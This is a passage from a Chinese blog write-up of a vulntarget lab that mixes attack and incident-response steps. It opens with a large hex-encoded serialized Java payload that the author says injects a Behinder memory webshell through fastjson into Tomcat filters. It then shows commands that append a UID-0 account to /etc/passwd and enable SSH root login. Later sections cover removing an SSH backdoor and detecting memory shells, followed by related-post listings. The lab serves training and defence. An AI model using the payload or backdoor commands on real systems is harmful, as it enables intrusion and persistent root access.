6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100166765744465636c61726564436f6e7374727563746f72010033285b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f723b01001d6a6176612f6c616e672f7265666c6563742f436f6e7374727563746f7201000e676574436c6173734c6f6164657201000b6e6577496e7374616e6365010027285b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000c736574417474726962757465010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b29560100136a617661782f63727970746f2f43697068657201000b676574496e7374616e6365010029284c6a6176612f6c616e672f537472696e673b294c6a617661782f63727970746f2f4369706865723b010008676574427974657301000428295b42010017285b424c6a6176612f6c616e672f537472696e673b295601001728494c6a6176612f73656375726974792f4b65793b295601000967657452656164657201001a28294c6a6176612f696f2f42756666657265645265616465723b0100166a6176612f696f2f4275666665726564526561646572010008726561644c696e6501000c6465636f6465427566666572010007646f46696e616c010006285b42295b4201001428294c6a6176612f6c616e672f4f626a6563743b01000c6765745265736f757263657301002728294c6f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f743b0100236f72672f6170616368652f636174616c696e612f5765625265736f75726365526f6f7401000a676574436f6e7465787401001f28294c6f72672f6170616368652f636174616c696e612f436f6e746578743b010007666f724e616d650100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c64010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01000973657446696c746572010019284c6a617661782f736572766c65742f46696c7465723b295601000d73657446696c7465724e616d65010015284c6a6176612f6c616e672f537472696e673b295601000e73657446696c746572436c61737301000c61646446696c746572446566010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724465663b295601000d61646455524c5061747465726e01001c6a617661782f736572766c65742f44697370617463686572547970650100075245515545535401001e4c6a617661782f736572766c65742f44697370617463686572547970653b01000d7365744469737061746368657201001261646446696c7465724d61704265666f7265010034284c6f72672f6170616368652f746f6d6361742f7574696c2f64657363726970746f722f7765622f46696c7465724d61703b29560021004b005e0001005f0001001200600061000100620000000200020008000100630064000100650000003d000200010000000b2ab700012a1202b50003b10000000200660000000e00030000002900040027000a002a00670000000c00010000000b0068006900000001006a006b00030065000000350000000200000001b10000000200660000000600010000002d00670000001600020000000100680069000000000001006c006d0001006e000000040001006f00700000000501006c000000010071007200030065000003180006000a000001ab2bc000043a042cc000053a051904b9000601003a06bb000759b700083a07190712091906b9000a0300571907120b1904b9000a0300571907120c1905b9000a030057b8000db6000e3a081904b9000f01001210b600119901541908b60012b60013b600141215b6001199001e1908b60012b600133a092a19091908190619041907b60016a7011e1908b60012b60013b60013b600141215b600119900211908b60012b60013b600133a092a19091908190619041907b60016a700ea1908b60012b60013b60013b60013b600141215b600119900241908b60012b60013b60013b600133a092a19091908190619041907b60016a700b01908b60012b60013b60013b60013b60013b600141215b600119900271908b60012b60013b60013b60013b600133a092a19091908190619041907b60016a700701908b60012b60013b60013b60013b60013b60013b600141215b6001199002a1908b60012b60013b60013b60013b60013b600133a092a19091908190619041907b60016a7002a1908b60012b60013b60013b60013b60013b60013b600133a092a19091908190619041907b600162d2b2cb900170300b100000004006600000072001c0000003000060031000c003200150033001e0034002a00350036003600420037004a00380059003a006c003b0076003c0087003d009d003e00aa003f00bb004000d4004100e4004200f5004301110044012400450135004601540047016a0048017b004a0194004b01a2004e01aa0051006700000098000f0076001100730074000900aa001100730074000900e4001100730074000901240011007300740009016a001100730074000901940016007300740009000001ab006800690000000001ab007500760001000001ab007700780002000001ab0079007a0003000601a5007b007c0004000c019f007d007e000500150196007f00800006001e018d008100820007004a016100830084000800850000000c0001001e018d0081008600070087000000330007ff0087000907008807008907008a07008b07008c07008d07008e07008f070090000033393ffb0045fc0026070091fa0007006e0000000600020092006f00700000000d03007500000077000000790000000100930064000100650000002b0000000100000001b10000000200660000000600010000005400670000000c00010000000100680069000000010094009500030065000002e50006001200000133b800181219b6001a3a062b121b06bd001c5903121d535904b2001e535905b2001e53b6001f3a07190704b60020013a082c1221b600223a08a700293a0919072c06bd00245903190653590403b800255359051906beb8002553b60026c0001c3a08190804bd001c5903122753b600283a09190904b60029190904bd002459032ab60012b6002a53b6002b3a0a1908122c04bd001c5903121d53b6001f3a0b190b04b6002012023a0c2d122d190cb9002e0300122fb800303a0d190d05bb003159190cb60032122fb70033b60034190dbb003559b700361904b900370100b60038b60039b6003a3a0e190b190a04bd00245903190e53b60026c0001c3a0f190fb6003b3a10190f123c04bd001c5903122453b6001f3a11191104b600201911191004bd00245903190553b6002657a700053a07b1000200300038003b0023000a012d0130003d000400660000006a001a00000057000a005a0027005b002d005c0030005f00380062003b0060003d0061006100640071006500770066008c0067009e006800a4006900a8006a00b2006b00b9006c00cd006d00e8006e00fd006f0104007001160071011c0072012d007401300073013200750067000000c00013003d002400960097000900270106009800990007003000fd009a00740008007100bc009b009c0009008c00a1009d009e000a009e008f009f0099000b00a8008500a00061000c00b9007400a100a2000d00e8004500a300a4000e00fd003000a50074000f0104002900a6009e00100116001700a70099001100000133006800690000000001330073007400010000013300830084000200000133007f0080000300000133007b007c000400000133008100820005000a012900a800a4000600850000000c0001000001330081008600050087000000480004ff003b000907008807009107009007008e07008c07008f07001d0700a907009100010700aa25ff00ce000707008807009107009007008e07008c07008f07001d00010700ab01007000000015050073000000830000007f0000007b00000081000000ac0000000200ad000100ae00af000300650000003f0000000300000001b1000000020066000000060001000000780067000000200003000000010068006900000000000100b000b100010000000100b200b30002006e00000004000100b40070000000090200b0000000b20000000100ae00b500030065000000490000000400000001b10000000200660000000600010000007b00670000002a0004000000010068006900000000000100b000b100010000000100b600b700020000000100b800b90003006e00000004000100b400700000000d0300b0000000b6000000b80000000800ba006400010065000001da0005000a000000de123e4bb8000db6000ec0003f4c2bb60040b900410100c000424d1243b800441245b600464e2d04b600472d2cb60048c000493a041904123eb9004a0200c7009cbb004b59b7004c3a05bb004d59b7004e3a0619061905b6004f1906123eb6005019061905b60012b60014b600512c1906b60052bb005359b700543a0719071255b600561907123eb600571907b20058b60059b6005a2c1907b6005b125c05bd001c5903125d535904124d53b600283a08190804b60029190805bd002459032c535904190653b6002bc0005c3a091904123e1909b9000a030057a700044bb10001000000d900dc003d000300660000006600190000007f00030080000d0081001a008200250083002a008400340085004000860049008700520088005900890060008a006d008b0073008c007c008d0083008e008a008f00950090009b009100b0009200b6009300cd009400d9009700dc009600dd0099006700000066000a0049009000bb00bc00050052008700bd00be0006007c005d00bf00c0000700b00029009b009c000800cd000c006c00c10009000300d600c200610000000d00cc00c300c40001001a00bf00c500c60002002500b400c700c80003003400a500c90082000400870000000a0003fb00d9420700ab00000200ca0000000200cb01470000000a000100e500e201460009707400013170770100787372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00055b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0014707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000027372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000002774000454657374740009546573742e6a61766174000367656e7371007e00170000000f71007e001971007e001a7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00137872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e0023787372001e636f6d2e616c69626162612e666173746a736f6e2e4a534f4e417272617900000000000000010200014c00046c69737471007e001378707371007e00220000000177040000000171007e00077878;",
    }
}

注意unicode编码关键字,这样便成功注入冰蝎内存马了。

连接冰蝎马

截至为止,三台服务器拿下

ssh远程连接内网03

添加账户

echo "system:adk6oNRwypFwA:0:0:eval_to_root:/root:/bin/bash" >> /etc/passwd

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
重启
/etc/init.d/ssh restart
应急响应--删除后门

清楚后门

https://wenku.csdn.net/answer/3hdhva72so

#查看后门
cat ~/.ssh/authorized_keys

存在一个后门ssh,直接进行删除

应急响应--内存马检查

手动先注入内存马

内存马连接成功

将cop.jar机器环境上传到目的服务器

java -jar copagent.jar
tar -cvf copagent.tar.copagent
tar -zvf copagent.tar

运行cop.jar文件

java -jar cop.jar

将运行文件下载后,进行分析

下载后使用d盾进行扫描

可以像内网机02的方法一样,可以进行一个热修复,这里就不做了

ka_ka11
关注
  • 24
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全工具 Godzilla 哥斯拉内存马使用
SHELLCODE_8BIT的博客
09-03 3280
测试时把生成的 shell.jsp 放到 tomcat webapps 下的任意一个可以访问的 web app 目录里,比如 webapps/ROOT 目录下,启动 tomcat 后访问 shell.jsp,返回页面没有报错即成功。测试环境:tomcat、Godzilla、jdk11。添加管理的 shell。
vulntarget-m-攻防应急靶场学习笔记
m0_64777251的博客
04-13 2688
对于后面内存马的审计,分析有些不懂,比较模糊。继续学习” />[外链图片转存中…(img-Cb0IA5HT-1713019622179)]下载到本地[外链图片转存中…(img-l7zi540I-1713019622179)]用d盾直接扫[外链图片转存中…(img-Y2GLHdH1-1713019622179)][外链图片转存中…(img-yD7uL4xD-1713019622179)]对于后面内存马的审计,分析有些不懂,比较模糊。继续学习。
【内网攻防】| vulntarget漏洞靶场系列(二)
Ms08067安全实验室
10-18 108
点击星标,即时接收最新推文文章来源|MS08067 内网攻防 知识星球本文作者:godunt玩靶场 认准内网攻防目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,提供优质的靶场系列,...
CVE-2022-26134 Confluence OGNL 注入复现及后利用
Love&Share
04-07 2561
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令攻击者提供的URI将被转换为namespace,然后该namespace将被转换为OGNL表达式进行计算(攻击者提供的url被间接转化成了OGNL表达式进行计算)
干货|冰蝎、哥斯拉 内存马应急排查
m0_60571990的博客
12-29 7554
干货|冰蝎、哥斯拉 内存马应急排查
vulntarget靶场系列.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。...
解决哥斯拉内存马 pagecontext 的问题
hackzkaq的博客
04-25 1468
前言 注入内存马借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决 HttpSession session = lastRequest.getSession(); pageContext.put(“request”, lastRequest); pageContext.put(“response”, lastResponse); pageContext.put(“session”, session); 能这么
应急--内存马查杀演示(极简)
m0_58355451的博客
08-30 2596
由客户端发起的Web请求后,中间件的各个独立的组件如Listener、Filter、Servlet等组件会在请求过程中做监听、判断、过滤等操作,内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode,达到持久化控制服务器的目的。以java为例,客户端发起的web请求会依次经过Listener、Filter、Servlet三个组件,我们只要在这个请求的过程中做手脚,在内存中修改已有的组件或者动态注册一个新的组件,插入恶意的shellcode,就可以达到我们的目的。
fastjson-c3p0:fastjson不出网回显利用
03-19
fastjson-c3p0 fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
6!Nacos反序列化漏洞利用工具v0.5
潇湘信安的博客
07-18 1873
刨洞安全@凉风师傅写的一个 Nacos Hessian 反序列化漏洞利用工具,目前已更新到v0.5,欢迎Star!
releaseBehinderShell:卸载冰蝎内存马
04-16
编译 mvn clean package -DskipTests 使用 首先查看机器进程,找到Tomcat或者Weblogic进程ID,如下为查找Tocmat进程ID ps -el | grep org.apache.catalina.startup.Bootstrap 运行卸载内存马程序 java -Xbootclasspath/a:$JAVA_HOME/lib/tools.jar -jar releaseBehinderShell-1.0-SNAPSHOT-jar-with-dependencies.jar [pid] 注意 本工具只在Tomcat环境下进行测试通过,weblogic环境未进行测试。 由于使用本工具导致的任何服务器崩溃等一系列问题,与本人无关。
C3P0反序列化链学习
虚幻私塾
04-21 1635
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
Nacos综合漏洞利用GUI工具-NacosExploitGUI
siu~
10-26 2000
Nacos综合漏洞利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用
vulnstack(一) 红日靶场复现
BuNahua的博客
09-01 2766
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Web】浅聊Java反序列化之C3P0——不出网Hex字节码加载利用
uuzeray的博客
03-08 938
不出网的情况下,这个C3P0的Gadget可以和fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等配合使用(调用setter和初始化方法)
[漏洞复现]Nacos derby注入不出网不落地的内存马利用
最新发布
LiangYueSec的博客
07-18 730
[漏洞复现]Nacos derby注入不出网不落地的内存马利用
Goby 利用内存马中的一些技术细节【技术篇】_内存码流量特征
2301_82243100的博客
04-15 654
以上部分简单列举了一些实战使用内存马技术中所使用的一些技术问题和遇到的一些坑的解决方案,在经过对以上技术的研究和解决后,在实战上快速使用内存马基本上就没有什么问题了。虽然我们讨论的是 JavaWeb 内存马技术,但实际可以看到,对抗的思路和技术早已经不单单在 Java 层,而是延伸到了 native 层、内存层面。这仍然是实战化利用中的九牛一毛。
内存马检测排查手段
热门推荐
SimoSimoSimo的博客
11-05 2万+
内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存马因其隐蔽性等优点从而越来越盛行。
哥斯拉Webshell
bring_coco的博客
03-03 5500
一.启动 命令:java -jar Godzilla-V2.96.jar 启动时同目录会生成data.db数据库存放数据 启动成功界面如下 二.使用(在本机实测) 这里演示jsp文件进行连接(需要提前配置好jsp环境) 1.点击管理->生成 这里默认密码,密钥(也可以更改,只要跟连接时候保持一致即可) 接下来将生成的文件存放在Tomcat目录下,注意是在Tomcat–>webapps–>ROOT目录下 可以打开指定路径,此时生成的shell.jsp已经生成 接下来点击目标—&
vulntarget-j
09-18
vulntarget-j 是一种安全测试平台,旨在模拟真实网络环境中的漏洞,以便于安全专业人员进行渗透测试和漏洞分析。该平台提供了一系列虚拟机和漏洞环境,使用户能够模拟并测试真实世界中常见的漏洞攻击。vulntarget-j 不仅可以用于入侵测试,还可以用于培训和教育目的。 vulntarget-j 的虚拟机和漏洞环境包括各种常见的漏洞和安全漏洞,例如操作系统漏洞、Web应用程序漏洞、网络服务漏洞等。用户可以使用这些虚拟机来发起各种类型的攻击,如恶意代码注入、SQL注入、跨站脚本等。除了这些预设的虚拟机,用户还可以创建自己的漏洞环境,以满足特定的安全测试需求。 vulntarget-j 还提供了一个用户友好的界面和工具集,使用户能够轻松配置和管理虚拟机和漏洞环境。用户可以根据自己的需求选择不同的配置选项,并且可以随时修改和更新环境。另外,该平台还提供了详细的文档和教程,帮助用户更好地了解和使用平台功能。 总而言之,vulntarget-j 是一个功能强大且易于使用的安全测试平台,适用于安全专业人员进行渗透测试和漏洞分析。它提供了各种虚拟机和漏洞环境,使用户可以模拟并测试现实世界中的漏洞攻击。此外,它还具有用户友好的界面和工具集,并提供了详细的文档和教程,帮助用户更好地使用平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值